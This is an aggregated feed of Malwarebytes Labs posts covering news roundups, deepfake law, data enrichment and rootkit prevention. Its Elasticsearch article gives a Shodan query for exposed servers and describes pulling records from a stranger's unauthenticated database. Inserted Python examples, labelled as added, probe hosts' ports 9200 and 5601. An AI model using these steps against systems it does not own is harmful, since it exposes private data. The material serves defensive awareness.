Techie Feeds

A week in security (January 13 – 19)

Malwarebytes - Mon, 01/20/2020 - 16:32

Last week on Malwarebytes Labs, we taught you how to prevent a rootkit attack, explained what data enrichment means, informed you about new rules on deepfakes in the US, and demonstrated how backdoors in elastic servers expose private data.

Other cybersecurity news
  • An online group of cybersecurity analysts calling themselves Intrusion Truth have revealed information about their fourth Chinese state-sponsored hacking operation. (Source: ZDNet)
  • Travelex warned customers of a phone scam threat in wake of their ransomware attack. (Source: Graham Cluley)
  • The federal government is preparing for another fight with Apple in an ongoing battle for access to encrypted iPhones. (Source: Vox recode)
  • Proof-of-concept exploit code has been published for critical flaws impacting the Cisco Data Center Network Manager (DCNM) tool for managing network platforms and switches. (Source: ThreatPost)
  • The Dutch National Cybersecurity Centre (NCSC) says that companies should consider turning off Citrix ADC and Gateway servers if the impact is acceptable. (Source: BleepingComputer)
  • Hackers stole personal information from 100,000 West Australians in a cyberattack on P&N Bank. (Source: The West Australian)
  • In an important Patch Tuesday release, Microsoft fixed critical bugs in CryptoAPI, RD Gateway, and .NET. (Source: Naked Security)
  • The latest update to Google’s Smart Lock app on iOS means you can now use your iPhone as a physical 2FA security key for logging into Google’s first-party services in Chrome. (Source: The Verge)
  • The domain name has been seized by the FBI. The website sold information claiming to have more than 12 billion records gathered from over 10,000 breaches. (Source: DarkReading)
  • Pretending to be the Permanent Mission of Norway, Emotet operators performed a targeted phishing attack against users associated with the United Nations. (Source: BleepingComputer)

Stay safe, everyone!

The post A week in security (January 13 – 19) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Business in the front, party in the back: backdoors in elastic servers expose private data

Malwarebytes - Fri, 01/17/2020 - 18:58

It seems like every day we read another article about a data breach or leak of cloud storage exposing millions of users’ data.

The unfortunate truth is that the majority of these leaks require no actual “hacking” on the part of the attacker. Most of the time, this highly confidential data is just sitting in open databases, ripe for the picking.
It’s all too easy to discover data leaks online, especially in cloud services, which says a lot about the state of security and preparedness for cyberattacks—we have a long way to go.

Continuing my series on insecure cloud infrastructure, where I previously covered AWS and PACS, I will be going into some detail on elastic servers. Specifically, I will cover a number of cases in which I discovered a common misconfiguration, leading to open backdoors, which expose many records of personal data.

Exposed databases using search

Before I go into detail on the accidental backdoors found in elastic servers, let’s take a look at just how easy it is to find one of these exposed databases online.

While there are dozens of tools and methods for this discovery phase, for the purposes of this demonstration, I used shodan, a search engine that crawls the web for Internet-connected devices.

Let’s do a quick experiment and see if it yields results. With a quick Google search on elastic databases, we learn that elastic databases by default listen on port 9200.

From there, we open up shodan and search:
elastic port:9200

This will basically bring up IPs who have a service responding on port 9200 and whose content contains the word “elastic.” Ninety-nine percent of the time, this will bring up an elastic search server.

For the sake of full comprehension, I will give a 10-second primer on how to use the elastic search API.

Elastic can be compared to MYSQL in the following way:

MYSQL                       ELASTIC
Databases                   Indices
Tables                      Types
Records – column and row    Document with properties

Here are a few key commands to help you navigate any elastic instance. The first is the /_cat command and the second is the /_search?pretty=true.
The cat command simply lists information, and it is a good starting point to understand what indices or fields you have to work with.

Elastic servers

Jumping into shodan, we start our search for elastic databases.

Let’s choose a random IP that comes up from the shodan query. In this case, it is a server residing in China:

We can check if it is open to the world by typing in:

This brings up the following results:

Seems like no authentication so far. Let’s look at what indices exist here by typing in /_cat/indices, which gives us the following results:

So far so good. It is clear that, at the moment, we will not likely be facing any authentication stopping us from accessing the data. Now we can list the contents of one of these indices, similar to a SELECT * FROM TABLE_NAME in SQL. Let’s choose one at random, kms_news, which looks to have 37 records inside.

We type
and voila! All the data spits out for us with hardly any effort at all.

As you can see, it was quite easy to find exposed data in a random elastic server online. In less than a minute, we found an exposed server and could continue to dump all the data. I am certain that if we spent a bit more time, we would find a database with a more critical leak.

There is a reason, after all, that these databases have received so much press for their infamous leaks.

The backdoor

Now let’s get to the topic at hand… the misconfigurations leading to the backdoor.

Along with elastic, you often hear the word Kibana. This is basically the GUI front end to an elastic database, allowing you to browse/search data and configure the structure and details of the elastic instance.

As such, it is common for companies to have an internal elastic DB on premise and expose the Kibana front end so that employees may access the data from their web browser, fully authenticated. In this case, the Kibana server could listen on port 5601, open to the Internet, and will access the data from an internal elastic DB behind the company’s local intranet.

Proper configuration

So where does the backdoor lie? Well, after having done an exhaustive search of various Kibana servers online, I noticed something funny happening on a large number of results.

I would browse to the Kibana instance and receive the login screen as expected, but after doing a port scan using nmap on the same IP, I noticed a familiar port being opened:

The infamous 9200!

To be specific, I found more than 20 servers within a span of five minutes with this same misconfiguration. What’s going on here is that an admin set up elastic search and decided to allow access through the Kibana front end, restricted by proper authentication. The problem, however, is that the actual data store on port 9200 isn’t just communicating internally. It, too, is exposed to the Internet, allowing backdoor access to the data directly from elastic queries carried out by anyone who wants to look, just as we did in the example above.

Here is an illustration showing the misconfiguration, which should make it all the more clear.

Finding a port 9200 exposed to the public does not mean there will be something of value inside. However, the combination of these two ports being exposed and restricting access only on Kibana almost guarantees that there is data here the company wanted to keep private.
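The primer on /_cat and /_search above, together with the 5601/9200 misconfiguration just described, can be turned into a self-audit for hosts you operate. The following is an added example, not code from the article or from Elastic: it parses the plain-text output of GET /_cat/indices, classifies what the two ports told us into the cases the article describes, and wraps both in a live check. The sample _cat output and its uuids are constructed, and using Kibana's /api/status as the "does the GUI demand a login?" probe is an assumption of this example.

```python
"""Audit helper for the Kibana/Elasticsearch split described above.

Added example, not code from the article. It checks hosts you operate for the
combination the article calls a backdoor: a login screen on the Kibana port
while the data store on 9200 answers anonymous queries. Only the standard
library is used; parsing and classification are pure functions so they can be
exercised without a live server.
"""
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import List, Optional

ES_PORT = 9200        # default Elasticsearch HTTP port (from the article)
KIBANA_PORT = 5601    # default Kibana port (from the article)
HEALTH = ("green", "yellow", "red")


@dataclass
class IndexInfo:
    name: str
    health: str
    docs: int


def parse_cat_indices(text: str) -> List[IndexInfo]:
    """Parse the plain-text body of GET /_cat/indices.

    Default column order is: health status index uuid pri rep docs.count
    docs.deleted store.size pri.store.size.  A header row (from ?v) or an
    error page never starts with a health value, so those lines are skipped.
    """
    found = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in HEALTH:
            continue
        docs = int(parts[6]) if len(parts) > 6 and parts[6].isdigit() else 0
        found.append(IndexInfo(name=parts[2], health=parts[0], docs=docs))
    return found


def total_docs(indices: List[IndexInfo]) -> int:
    """Rough size of what an anonymous caller could dump with /_search."""
    return sum(i.docs for i in indices)


def http_get(url: str, timeout: float = 5.0):
    """Return (status, body) for a GET with no credentials; (None, '') if unreachable."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, ""
    except (urllib.error.URLError, OSError):
        return None, ""


def classify(es_anonymous: Optional[bool], kibana_auth: Optional[bool]) -> str:
    """Map what the two ports told us onto the cases the article describes.

    es_anonymous: True if /_cat/indices on 9200 returned 200 without credentials,
                  False if it returned 401/403, None if the port did not answer.
    kibana_auth:  True if 5601 demanded a login, False if it let us in, None if closed.
    """
    if es_anonymous is True and kibana_auth is True:
        return "backdoor"     # authenticated GUI, but the data store behind it is public
    if es_anonymous is True:
        return "wide-open"    # no authentication anywhere (the random-IP example)
    if es_anonymous is False:
        return "closed"       # 9200 refuses anonymous queries: the intended setup
    if kibana_auth is None:
        return "unreachable"
    return "kibana-only"      # only the GUI is exposed; 9200 stays internal


def audit(host: str) -> dict:
    """Live check of one host you are responsible for.

    /_cat/indices is from the article; treating a 401/403 from Kibana's
    /api/status as "login required" is an assumption of this example.
    """
    es_status, es_body = http_get(f"http://{host}:{ES_PORT}/_cat/indices")
    kb_status, _ = http_get(f"http://{host}:{KIBANA_PORT}/api/status")
    es_anonymous = None if es_status is None else es_status == 200
    kibana_auth = None if kb_status is None else kb_status in (401, 403)
    indices = parse_cat_indices(es_body) if es_anonymous else []
    return {
        "host": host,
        "verdict": classify(es_anonymous, kibana_auth),
        "indices": [i.name for i in indices],
        "docs": total_docs(indices),
    }


# Constructed sample in the default _cat/indices layout; the uuids are made up.
SAMPLE_CAT = """health status index uuid pri rep docs.count docs.deleted store.size pri.store.size
yellow open kms_news  AbCdEfGhIjKlMnOpQrStUv 5 1 37 0 61.2kb 61.2kb
green  open .kibana_1 WxYzAbCdEfGhIjKlMnOpQr 1 0  3 0 12.1kb 12.1kb
"""

if __name__ == "__main__":
    sample = parse_cat_indices(SAMPLE_CAT)
    print([i.name for i in sample], total_docs(sample), classify(True, True))
```

A "backdoor" verdict is the case to fix first: the data store should listen only on an internal address (Elasticsearch's network.host setting) and require credentials, so that Kibana's login screen is not the only thing standing between the Internet and the indices.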

Elastic ready to snap

Elastic is likely the number one source of leaked data online, and after conducting this research, I would attribute that to how easy it is to misconfigure. The focus, of course, being on the relationship between the internal server on 9200 and the public-facing component on 5601.

The purpose of this article was not to talk about a specific company or to put anyone on blast for exposing public data. Rather, I am hoping to explain just how many servers are sitting on the Internet with this backdoor. There are thousands of elastic servers open to the public and exposing data—this is nothing new. What makes these specific cases unique is that there were clearly attempts to incorporate some type of security; however, the platform is clearly being misunderstood.

Because elastic search is such a commonly used cloud database, it’s important to highlight this specific misconfiguration because it can easily be fixed.

Finding the exposed data was neither the result of a 1337 hack, nor a difficult side channel to discover. Hopefully this may help admins using elastic to better understand the danger of defaults, and for security analysts, this hopefully provided some useful information on researching new cloud infrastructures.

Stay tuned for the next article in this series where I will be covering the details of various leaks found on elastic.

The post Business in the front, party in the back: backdoors in elastic servers expose private data appeared first on Malwarebytes Labs.


Explained: data enrichment

Malwarebytes - Thu, 01/16/2020 - 18:27

How do your favorite brands know to use your first name in the subject line of their emails? Why do you seem to get discounts and special offers on products you’ve recently purchased? Businesses are able to personalize their marketing messages thanks to data enrichment.

Data enrichment applies to the process of enhancing, refining, and improving on raw data. It is usually the last step in constructing a dataset for a marketing campaign, but can be used for several other goals.

Contact enrichment is the most common form of data enrichment. Contact enrichment is the process of adding additional information to existing contacts for more complete data.

Consider, for example, the scenario where a database contains names and addresses, but is missing telephone numbers that sales teams will need to reach out to prospective customers. One option is to apply contact enrichment that can match the data that the existing database contains with the telephone numbers listed in another database.

Definition of data enrichment, extended

Data enrichment is defined as merging third-party data from an external authoritative source with an existing database of first-party customer data. Some organizations do this to enhance the data they already possess so they can make more informed decisions.

More broadly, data enrichment refers to processes used to enhance, refine, or otherwise improve on raw data. In this context, it encompasses the whole strategy and process needed to improve existing databases. This idea and other related concepts are essential in making data a valuable asset for almost any modern enterprise.

Data enrichment processes

Even though data enrichment can be accomplished in several different ways, many of the tools used to refine data in a dataset focus on correcting errors or filling in incomplete data. A common data enrichment process would, for example, correct likely misspellings or typographical errors in a database by using precision algorithms designed for that purpose. And some data enrichment tools could also add information to simple data tables.

Another way in which data enrichment can work is by extrapolating data. Through methodologies such as fuzzy logic, engineers can produce extra information from a given raw data set. This and other similar projects can also be described as data enrichment activities.

Data enrichment can also include the merger of data-tables into a new dataset by using corresponding fields. In layman’s terms: Companies can buy access to other databases and look for additional information about their customers, adding that information to their own database.

Privacy concerns

The merger or combination of data hardly ever happens after a subject has been asked for permission. This poses a privacy problem, as users typically have a reasonable idea about which information they have provided to a specific organization, but if organizations add information from other databases, this picture will be skewed. The organization will have information about them of which they are not aware.

As long as this is generally available information, the problem is minor. But consider the famous example of your insurance company getting hold of the data gathered on the client-card of your supermarket. Knowing what you buy and consume may be something you would rather keep from them.

There are some privacy regulations that limit data enrichment for this very reason. The General Data Protection Regulation (GDPR) is a regulation on data protection and privacy in the European Union (EU) and the European Economic Area (EEA). It also addresses the transfer of personal data outside the EU and EEA areas. GDPR allows customers to ask which information is present about them in an organization’s database and have records or parts of the records deleted.

Since GDPR also regulates the exchange and transfer of personal data, this can severely limit an organization’s choice of data enrichment providers. In the GDPR terminology, any data provider you use is a “Data Processor.” In order to send any EU citizens’ data to any Data Provider for any purpose, including enrichment, you must have a Data Processing Agreement (DPA) signed with the vendor.

A DPA is a legally-binding contract that states the rights and obligations of each party concerning the protection of personal data. They are mandatory to establish a chain of responsibility for the use, and safety, of personal data.

Steps to successful data enrichment

There are a few things to be done before you embark on a successful data enrichment process:

  • Sanitize your own data, or you will end up paying for data you will never use. Getting extra information about non-existing people, or adding to incomplete records is a waste.
  • Determine your goals and purpose for the data enrichment exercise. Again, avoid paying for data that turns out to be useless. Don’t pay for data tables just because they are available. If you are not going to use them, skip them.
  • Determine which processes the enriched data will support. Will the projected return outweigh the cost?
  • Determine your target market in terms of account profiles and personas. Do you want the data for a subset of customers that meet certain criteria, or would you, for example, like to exclude residents of GDPR-enforcing countries?

Sanitizing not only means removing duplicates, but also checking the validity of older data and the usefulness of entries that were filled out by customers or prospects themselves—on your website, for example.

Once you have determined your goals and decided which data are crucial to achieve these goals, then start looking for a data provider. Some may be more expensive but stronger in a certain data field. You can maximize your success by finding the data provider that best fits your needs.
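The merge "by corresponding fields" described earlier and the sanitizing step above (remove duplicates, check validity, decide which subjects and fields are in scope) fit together as one pipeline. The following is an added example, not code from the article: the record layout (email, name, country, phone), the provider table and the set of excluded jurisdictions are all constructed for illustration, and the email column is assumed to be the corresponding field the two tables are joined on.

```python
"""Sanitize first, then enrich on a corresponding field.

Added example, not from the article. Sample records, the provider table and
the excluded-country set are constructed; the join key (email) is an assumption.
"""
import re
from typing import Dict, Iterable, List, Optional, Tuple

Record = Dict[str, Optional[str]]
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def normalize_email(value: Optional[str]) -> Optional[str]:
    """Lower-case and trim the join key; None if it is not a plausible address."""
    if not value:
        return None
    value = value.strip().lower()
    return value if EMAIL_RE.match(value) else None


def completeness(record: Record) -> int:
    """Number of non-empty fields; decides which duplicate survives."""
    return sum(1 for v in record.values() if v not in (None, ""))


def sanitize(records: Iterable[Record]) -> List[Record]:
    """Drop records without a valid join key and collapse duplicates.

    Paying a provider to enrich an unreachable or duplicated contact is the
    waste the article warns about, so this runs before any data leaves.
    """
    survivors: Dict[str, Record] = {}
    for raw in records:
        key = normalize_email(raw.get("email"))
        if key is None:
            continue
        cleaned = dict(raw, email=key)
        if key not in survivors or completeness(cleaned) > completeness(survivors[key]):
            survivors[key] = cleaned
    return list(survivors.values())


def select_for_enrichment(records: List[Record], excluded_countries) -> Tuple[List[Record], List[Record]]:
    """Split into (to_send, kept_back): subjects in excluded jurisdictions never go to the processor."""
    to_send: List[Record] = []
    kept_back: List[Record] = []
    for r in records:
        (kept_back if r.get("country") in excluded_countries else to_send).append(r)
    return to_send, kept_back


def enrich(own: List[Record], provider: List[Record], fields: List[str]) -> List[Record]:
    """Left-join provider rows onto own records by email.

    Only the requested fields are copied, and only where our record is still
    empty, so extra columns the provider offers (e.g. income) are never stored.
    """
    lookup = {normalize_email(p.get("email")): p for p in provider}
    lookup.pop(None, None)  # provider rows with an unusable key cannot match anything
    merged = []
    for r in own:
        out = dict(r)
        match = lookup.get(r["email"])
        if match:
            for f in fields:
                if not out.get(f) and match.get(f):
                    out[f] = match[f]
        merged.append(out)
    return merged


def run_enrichment(own, provider, fields, excluded_countries) -> List[Record]:
    """The whole pipeline: sanitize, scope, merge, then reattach what was kept back."""
    clean = sanitize(own)
    to_send, kept_back = select_for_enrichment(clean, excluded_countries)
    return enrich(to_send, provider, fields) + kept_back


# Constructed sample data: two spellings of one contact, one junk address,
# and one EU resident who must not be sent to the provider.
OWN: List[Record] = [
    {"email": "Alice@Example.com ", "name": "Alice", "country": None, "phone": None},
    {"email": "alice@example.com", "name": "Alice Smith", "country": "US", "phone": None},
    {"email": "not-an-address", "name": "Ghost", "country": "US", "phone": None},
    {"email": "bob@example.org", "name": "Bob", "country": "US", "phone": None},
    {"email": "claire@example.eu", "name": "Claire", "country": "DE", "phone": None},
]
PROVIDER: List[Record] = [
    {"email": "ALICE@example.com", "phone": "+1-555-0100", "income": "high"},
    {"email": "bob@example.org", "phone": "+1-555-0101"},
    {"email": "claire@example.eu", "phone": "+49-555-0102"},
]
EXCLUDED = {"DE", "FR"}  # placeholder set, not a complete list of GDPR countries

if __name__ == "__main__":
    for row in run_enrichment(OWN, PROVIDER, ["phone"], EXCLUDED):
        print(row)
```

Running it yields three records: the two Alice rows collapse into the more complete one and gain a phone number, Bob gains his, the junk address is dropped before it could cost anything, and Claire stays untouched because her record never reached the provider. The "fields" argument is the place to encode the purpose you decided on beforehand, which is why the provider's extra income column is not copied even though it was offered.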

Not all data enrichment makes you rich

Keep in mind that buying—and storing—the extra data will cost you. Data needs to be backed up and protected, and the storage costs can amount to a pretty sum depending on the size of the datasets. And if the data is not kept up to date, then it may soon become worthless.

Finally, if you’re ever breached, the amount and type of leaked data are determining factors for the ensuing loss of reputation.

The post Explained: data enrichment appeared first on Malwarebytes Labs.


Rules on deepfakes take hold in the US

Malwarebytes - Wed, 01/15/2020 - 16:59

For years, an annual, must-pass federal spending bill has served as a vehicle for minor or contentious provisions that might otherwise falter in standalone legislation, such as the prohibition of new service member uniforms, or the indefinite detainment of individuals without trial.

In 2019, that federal spending bill, called the National Defense Authorization Act (NDAA), once again included provisions separate from the predictable allocation of Department of Defense funds. This time, the NDAA included language on deepfakes, the machine-learning technology that, with some human effort, has created fraudulent videos of UK political opponents Boris Johnson and Jeremy Corbyn endorsing one another for Prime Minister.

Matthew F. Ferraro, a senior associate at the law firm WilmerHale who advises clients on national security, cyber security, and crisis management, called the deepfakes provisions a “first.”

“This is the first federal legislation on deepfakes in the history of the world,” Ferraro said about the NDAA, which was signed by the President into law on December 20, 2019.

But rather than creating new policies or crimes regarding deepfakes—like making it illegal to develop or distribute them—the NDAA asks for a better understanding of the burgeoning technology. It asks for reports and notifications to Congress.

Per the NDAA’s new rules, the US Director of National Intelligence must, within 180 days, submit a report to Congress that provides information on the potential national security threat that deepfakes pose, along with the capabilities of foreign governments to use deepfakes in US-targeted disinformation campaigns, and what countermeasures the US currently has or plans to develop.

Further, the Director of National Intelligence must notify Congress each time a foreign government either has, is currently, or plans to launch a disinformation campaign using deepfakes of “machine-generated text,” like that produced by online bots that impersonate humans.

Lee Tien, senior staff attorney for Electronic Frontier Foundation, said that, with any luck, the DNI report could help craft future, informed policy. Whether Congress will actually write any legislation based on the DNI report’s information, however, is a separate matter.

“You can lead a horse to water,” Tien said, “but you can’t necessarily make them drink.”

With the NDAA’s passage, Malwarebytes is starting a two-part blog on deepfake legislation in the United States. Next week we will explore several Congressional and stateside bills in further depth.

The National Defense Authorization Act

The National Defense Authorization Act of 2020 is a sprawling, 1,000-plus page bill that includes just two sections on deepfakes. The sections set up reports, notifications, and a deepfakes “prize” for research in the field.

According to the first section, the country’s Director of National Intelligence must submit an unclassified report to Congress within 180 days that covers the “potential national security impacts of machine manipulated media (commonly known as “deepfakes”); and the actual or potential use of machine-manipulated media by foreign governments to spread disinformation or engage in other malign activities.”

The report must include the following seven items:

  • An assessment of the technology capabilities of foreign governments concerning deepfakes and machine-generated text
  • An assessment of how foreign governments could use or are using deepfakes and machine-generated text to “harm the national security interests of the United States”
  • An updated identification of countermeasure technologies that are available, or could be made available, to the US
  • An updated identification of the offices inside the US government’s intelligence community that have, or should have, responsibility on deepfakes
  • A description of any research and development efforts carried out by the intelligence community
  • Recommendations about whether the intelligence community needs tools, including legal authorities and budget, to combat deepfakes and machine-generated text
  • Any additional info that the DNI finds appropriate

The report must be submitted in an unclassified format. However, an annex to the report that specifically addresses the technological capabilities of the People’s Republic of China and the Russian Federation may be classified.

The NDAA also requires that the DNI notify the Congressional intelligence committees each time there is “credible information” that an identifiable, foreign entity has used, will use, or is currently using deepfakes or machine-generated text to influence a US election or domestic political processes.

Finally, the NDAA also requires that the DNI set up what it calls a “deepfakes prize competition,” in which a program will be established “to award prizes competitively to stimulate the research, development, or commercialization of technologies to automatically detect machine-manipulated media.” The prize amount cannot exceed $5 million per year.

As the first, approved federal language on deepfakes, the NDAA is rather non-controversial, Tien said.

“Politically, there’s nothing particularly significant about the fact that this is the first thing that we’ve seen the government enact in any sort of way about [deepfakes and machine-generated text],” Tien said, emphasizing that the NDAA has been used as a vehicle for other report-making provisions for years. “It’s also not surprising that it’s just reports.”

But while the NDAA focuses only on research, other pieces of legislation—including some that have become laws in a couple of states—directly confront the assumed threat of deepfakes to both privacy and trust.

Pushing back against pornographic and political deception

Though today feared as a democracy destabilizer, deepfakes began not with political subterfuge or international espionage, but with porn.

In 2017, a Reddit user named “deepfakes” began posting short clips of nonconsensual pornography that mapped the digital likenesses of famous actresses and celebrities onto the bodies of pornographic performers. This proved wildly popular.

In little time, a dedicated “subreddit”—a smaller, devoted forum—was created, and increasingly more deepfake pornography was developed and posted online. Two offshoot subreddits were created, too—one for deepfake “requests,” and another for fulfilling those requests. (Ugh.)

While the majority of deepfake videos feature famous actresses and musicians, it is easy to imagine an abusive individual making and sharing a deepfake of an ex-partner to harm and embarrass them.

In 2018, Reddit banned the deepfake subreddits, but the creation of deepfake material surged, and in the same year, a new potential threat emerged.

Working with producers at Buzzfeed, comedian and writer Jordan Peele helped showcase the potential danger of deepfake technology when he lent his voice to a manipulated video of President Barack Obama.

“We’re entering an era in which our enemies can make anyone say anything at any point in time, even if they would never say those things,” Peele said, posing as President Obama.

This year, that warning gained some legitimacy, when a video of Speaker of the House of Representatives Nancy Pelosi was slowed down to fool viewers into thinking that the California policymaker was either drunk or impaired. Though the video was not a deepfake because it did not rely on machine-learning technology, its impact was clear: It was viewed by more than 2 million people on Facebook and shared on Twitter by the US President’s personal lawyer, Rudy Giuliani.

These threats spurred lawmakers in several states to introduce legislation to prohibit anyone from developing or sharing deepfakes with the intent to harm or deceive.

On July 1, Virginia passed a law that makes the distribution of nonconsensual pornographic videos a Class 1 misdemeanor. On September 1, Texas passed a law to prohibit the making and sharing of deepfake videos with the intent to harm a political candidate running for office. In October, California Governor Gavin Newsom signed Assembly Bills 602 and 730, which, respectively, make it illegal to create and share nonconsensual deepfake pornography and to try to influence a political candidate’s run for office with a deepfake released within 60 days of an election.

Along the way, Congressional lawmakers in Washington, DC, have matched the efforts of their stateside counterparts, with one deepfake bill clearing the House of Representatives and another deepfake bill clearing the Senate.

The newfound interest from lawmakers is a good thing, Ferraro said.

“People talk a lot about how legislatures are slow, and how Congress is captured by interests, or it’s suffering ossification, but I look at what’s going on with manipulated media, and I’m filled with some sense of hope and satisfaction,” Ferraro said. “Both houses have reacted quickly, and I think that should be a moment of pride.”

But the new legislative proposals are not universally approved. Upon the initial passage of California’s AB 730, the American Civil Liberties Union urged Gov. Newsom to veto the bill.

“Despite the author’s good intentions, this bill will not solve the problem of deceptive political videos; it will only result in voter confusion, malicious litigation, and repression of free speech,” said Kevin Baker, ACLU legislative director.

Another organization that opposes dramatic, quick regulation on deepfakes is EFF, which wrote earlier in the summer that “Congress should not rush to regulate deepfakes.”

Why then, does EFF’s Tien welcome the NDAA?

Because, he said, the NDAA does not introduce substantial policy changes, but rather proposes a first step in creating informed policy in the future.

“From an EFF standpoint, we do want to encourage folks to actually synthesize the existing knowledge and to get to some sort of common ground on which people can then make policy choices,” Tien said. “We hope the [DNI report] will be mostly available to the public, because, if the DNI actually does what they say they’re going to do, we will learn more about what folks outside the US are doing [on deepfakes], and both inside the US, like efforts funded by the Department of Defense or by the intelligence community.”

Tien continued: “To me, that’s all good.”

Wait and see

The Director of National Intelligence has until June to submit their report on deepfakes and machine-generated text. But until then, more states, such as New York and Massachusetts, may forward deepfake bills that were already introduced last year.

Further, as deepfakes continue to be shared online, more companies may have to grapple with how to treat them. Just last week, Facebook announced a new political deepfake policy that many argue does little to stop the wide array of disinformation posted on the platform.

Join us next week, when we take a deeper look at current Federal and statewide deepfake legislation and at the tangential problem of fraudulent, low-tech videos now referred to as “cheapfakes.”

The post Rules on deepfakes take hold in the US appeared first on Malwarebytes Labs.


How to prevent a rootkit attack

Malwarebytes - Tue, 01/14/2020 - 17:31

If you’re ever at the receiving end of a rootkit attack, then you’ll understand why they are considered one of the most dangerous cyberthreats today.

Rootkits are a type of malware designed to stay undetected on your computer. Cybercriminals use rootkits to remotely access and control your machine, burrowing deep into the system like a latched-on tick. Rootkits typically infect computers via phishing email, fooling users with a legitimate-looking email that actually contains malware, but sometimes they can be delivered through exploit kits.

This article provides an overview of the different types of rootkits and explains how you can prevent them from infecting your computer.

What is a rootkit?

Originally, a rootkit was a collection of tools that enabled administrative access to a computer or network. Today, rootkits are associated with a malicious type of software that provides root-level, privileged access to a computer while hiding its existence and actions. Hackers use rootkits to conceal themselves until they decide to execute their malware.

In addition, rootkits can deactivate anti-malware and antivirus software, and badly damage user-mode applications. Attackers can also use rootkits to spy on user behavior, launch DDoS attacks, escalate privileges, and steal sensitive data.

Possible outcomes of a rootkit attack

Today, malware authors can easily purchase rootkits on the dark web and use them in their attacks. The list below explores some of the possible consequences of a rootkit attack.

Sensitive data stolen

Rootkits enable hackers to install additional malicious software that steals sensitive information, like credit card numbers, social security numbers, and user passwords, without being detected.

Malware infection

Attackers use rootkits to install malware on computers and systems without being detected. Rootkits conceal the malicious software from any existing anti-malware or antivirus, often de-activating security software without user knowledge. As a result of deactivated anti-malware and antivirus software, rootkits enable attackers to execute harmful files on infected computers.

File removal

Rootkits grant access to all operating system files and commands. Attackers using rootkits can easily delete Linux or Windows directories, registry keys, and files.


Cybercriminals leverage rootkits to exploit unsecured networks and intercept personal user information and communications, such as emails and messages exchanged via chat.

Remote control

Hackers use rootkits to remotely access and change system configurations. Then hackers can change the open TCP ports inside firewalls or change system startup scripts.

Types of rootkit attacks

Attackers can install different rootkit types on any system. Below, you’ll find a review of the most common rootkit attacks.

Application rootkits

Application rootkits replace legitimate files with infected rootkit files on your computer. These rootkits infect standard programs like Microsoft Office, Notepad, or Paint. Attackers can get access to your computer every time you run those programs. Antivirus programs can easily detect them since they both operate on the application layer.

Kernel rootkits

Attackers use these rootkits to change the functionality of an operating system by inserting malicious code into it. This gives them the opportunity to easily steal personal information.

Bootloader rootkits

The bootloader mechanism is responsible for loading the operating system on a computer. These rootkits replace the original bootloader with an infected one. This means that bootloader rootkits are active even before the operating system is fully loaded.

Hardware and firmware rootkits

This kind of rootkit can get access to a computer’s BIOS system or hard drives as well as routers, memory chips, and network cards.

Virtualized rootkits

Virtualized rootkits take advantage of virtual machines in order to control operating systems. They were developed by security researchers in 2006 as a proof of concept.

These rootkits create a virtual machine before the operating system loads, and then simply take over control of your computer. Virtualized rootkits operate at a higher level than operating systems, which makes them almost undetectable.

How to prevent a rootkit attack

Rootkit attacks are dangerous and harmful, but they only infect your computer if you somehow launched the malicious software that carries the rootkit. The tips below outline the basic steps you should follow to prevent rootkit infection.

Scan your systems

Scanners are software programs designed to analyze a system and remove active rootkits.

Rootkit scanners are usually effective in detecting and removing application rootkits. However, they are ineffective against kernel, bootloader, or firmware attacks. Kernel level scanners can only detect malicious code when the rootkit is inactive. This means that you have to stop all system processes and boot the computer in safe mode in order to effectively scan the system.

Security experts claim that, because of these limitations, a single scanner cannot guarantee the complete security of a system. Therefore, many advise using multiple scanners and rootkit removers. To fully protect yourself against rootkit attacks at the boot or firmware level, you need to back up your data and then reinstall the entire system.

Avoid phishing attempts

Phishing is a type of social engineering attack in which hackers use email to deceive users into clicking on a malicious link or downloading an infected attachment.

The fraudulent email can be anything, from Nigerian prince scams asking to reclaim gold to fake messages from Facebook requesting that you update your login credentials. The infected attachments can be Excel or Word documents, a regular executable program, or an infected image.

Update your software

Many software programs contain vulnerabilities and bugs that allow cybercriminals to exploit them—especially older, legacy software. Usually, companies release regular updates to fix these bugs and vulnerabilities. But not all vulnerabilities are made public. And once software has reached a certain age, companies stop supporting them with updates.

Ongoing software updates are essential for staying safe and preventing hackers from infecting you with malware. Keep all programs and your operating system up-to-date, and you can avoid rootkit attacks that take advantage of vulnerabilities.

Use next-gen antivirus

Malware authors always try to stay one step ahead of the cybersecurity industry. To counter their progress, you should use antivirus programs that leverage modern security techniques, like machine learning-based anomaly detection and behavioral heuristics. This type of antivirus can determine the origin of the rootkit based on its behavior, detect the malware, and block it from infecting your system.

Monitor network traffic

Network traffic monitoring techniques analyze network packets in order to identify potentially malicious network traffic. Network analytics can also mitigate threats more quickly while isolating the network segments that are under attack to prevent the attack from spreading.

Rootkit prevention beats clean-up

A rootkit is one of the most difficult types of malware to find and remove. Attackers frequently use them to remotely control your computer, eavesdrop on your network communication, or execute botnet attacks.

This is a nasty type of malware that can seriously affect your computer’s performance and lead to personal data theft. Since it’s difficult to detect a rootkit attack, prevention is often the best defense. Use the tips offered in this article as a starting point for your defense strategy. To ensure continual protection, continue learning. Attacks always change, and it’s important to keep up.

The post How to prevent a rootkit attack appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (January 6 – 12)

Malwarebytes - Mon, 01/13/2020 - 16:29

Last week on Malwarebytes Labs, we told readers how to check the safety of websites and their related files, explored the shady behavior taking place within the billion-dollar search industry, broke down the top six ways that hackers target retail businesses, and put a spotlight on the ransomware family Phobos.

We also broke a major new story when we discovered that a government-subsidized mobile phone is being shipped with pre-installed, unremovable malware.  

Other cybersecurity news

Stay safe, everyone!

The post A week in security (January 6 – 12) appeared first on Malwarebytes Labs.


Threat spotlight: Phobos ransomware lives up to its name

Malwarebytes - Fri, 01/10/2020 - 18:04

Ransomware has struck dead on organizations since it became a mainstream tool in cybercriminals’ belts years ago. From massive WannaCry outbreaks in 2017 to industry-focused attacks by Ryuk in 2019, ransomware’s got its hooks in global businesses and shows no signs of stopping. That includes a malware family known as Phobos ransomware, named after the Greek god of fear.

